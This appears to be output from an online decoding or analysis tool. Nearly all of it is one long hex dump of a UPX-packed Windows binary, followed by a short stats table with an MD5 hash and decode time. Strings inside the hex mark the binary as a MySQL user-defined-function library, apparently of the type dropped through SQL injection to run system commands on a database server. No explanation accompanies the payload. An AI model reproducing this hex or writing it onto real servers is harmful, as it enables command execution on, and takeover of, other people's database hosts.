000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAFunction Calls
| None |
Stats
| MD5 | 8e3348f2abf5379e4088b932bf049d75 |
| Eval Count | 0 |
| Decode Time | 534 ms |